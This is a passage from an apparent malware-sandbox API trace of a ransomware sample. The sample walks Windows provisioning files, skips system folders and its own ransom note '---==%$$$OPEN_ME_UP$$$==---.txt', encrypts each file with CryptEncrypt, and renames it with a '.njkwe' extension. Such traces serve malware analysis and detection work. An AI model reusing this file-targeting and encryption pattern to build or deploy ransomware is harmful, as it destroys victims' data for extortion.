(lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.781] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.781] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\266__connections_cellular_vodafone malta (malta)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.781] GetTickCount () returned 0x1153c79 [0077.781] GetTickCount () returned 0x1153c79 [0077.781] GetTickCount () returned 0x1153c79 [0077.781] GetTickCount () returned 0x1153c79 [0077.782] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.782] GetProcessHeap () returned 0xbe0000 [0077.782] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.782] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0077.793] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.793] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0077.793] GetProcessHeap () returned 0xbe0000 [0077.793] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.793] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.793] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.793] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.793] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.794] CloseHandle (hObject=0x43c) returned 1 [0077.794] GetProcessHeap () returned 0xbe0000 [0077.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.794] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0077.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\266__connections_cellular_vodafone malta (malta)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\266__connections_cellular_vodafone malta (malta)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.794] GetProcessHeap () returned 0xbe0000 [0077.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.794] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07ce9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a07ce9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a07ce9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="267__C~1.PRO")) returned 1 [0077.795] lstrcmpiW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.795] lstrcmpiW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.795] lstrcmpiW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.795] lstrcmpiW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.795] lstrcmpiW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.795] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.795] StrStrIW (lpFirst="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.795] lstrcmpW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.795] lstrcmpW (lpString1="267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.795] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.795] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\267__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.795] GetTickCount () returned 0x1153c88 [0077.795] GetTickCount () returned 0x1153c88 [0077.795] GetTickCount () returned 0x1153c88 [0077.795] GetTickCount () returned 0x1153c88 [0077.795] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.795] GetProcessHeap () returned 0xbe0000 [0077.795] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.795] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.797] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.797] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.797] GetProcessHeap () returned 0xbe0000 [0077.797] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.797] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.797] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.798] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.798] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.798] CloseHandle (hObject=0x43c) returned 1 [0077.798] GetProcessHeap () returned 0xbe0000 [0077.798] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.798] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\267__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\267__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\267__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.798] GetProcessHeap () returned 0xbe0000 [0077.799] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.799] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07ce9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a07ce9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a07ce9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", cAlternateFileName="268__C~1.PRO")) returned 1 [0077.799] lstrcmpiW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.799] lstrcmpiW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.799] lstrcmpiW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.799] lstrcmpiW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.799] lstrcmpiW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.799] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml") returned 163 [0077.799] StrStrIW (lpFirst="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.799] lstrcmpW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.799] lstrcmpW (lpString1="268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.799] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\268__connections_cellular_telcel gsm (mexico)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.800] GetTickCount () returned 0x1153c88 [0077.800] GetTickCount () returned 0x1153c88 [0077.800] GetTickCount () returned 0x1153c88 [0077.800] GetTickCount () returned 0x1153c88 [0077.800] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.800] GetProcessHeap () returned 0xbe0000 [0077.800] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.800] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0077.801] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.801] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0077.801] GetProcessHeap () returned 0xbe0000 [0077.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.802] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.802] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.802] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.802] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.802] CloseHandle (hObject=0x43c) returned 1 [0077.802] GetProcessHeap () returned 0xbe0000 [0077.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.802] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\268__connections_cellular_telcel gsm (mexico)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\268__Connections_Cellular_TELCEL GSM (Mexico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\268__connections_cellular_telcel gsm (mexico)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.803] GetProcessHeap () returned 0xbe0000 [0077.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.803] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07ce9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a07ce9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a07ce9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="269__C~1.PRO")) returned 1 [0077.803] lstrcmpiW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.803] lstrcmpiW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.803] lstrcmpiW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.803] lstrcmpiW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.803] lstrcmpiW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.803] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.803] StrStrIW (lpFirst="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.803] lstrcmpW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.803] lstrcmpW (lpString1="269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.803] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.803] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\269__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.803] GetTickCount () returned 0x1153c88 [0077.803] GetTickCount () returned 0x1153c88 [0077.803] GetTickCount () returned 0x1153c88 [0077.803] GetTickCount () returned 0x1153c88 [0077.804] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.804] GetProcessHeap () returned 0xbe0000 [0077.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.804] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0077.805] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.805] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0077.805] GetProcessHeap () returned 0xbe0000 [0077.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.805] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.805] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.806] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.806] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.806] CloseHandle (hObject=0x43c) returned 1 [0077.806] GetProcessHeap () returned 0xbe0000 [0077.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.806] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\269__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\269__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\269__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.807] GetProcessHeap () returned 0xbe0000 [0077.807] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.807] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901892f8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901892f8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901892f8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x33b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="26__CO~1.PRO")) returned 1 [0077.807] lstrcmpiW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.807] lstrcmpiW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.807] lstrcmpiW (lpString1="26__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.807] lstrcmpiW (lpString1="26__Connections_Cellular_A1 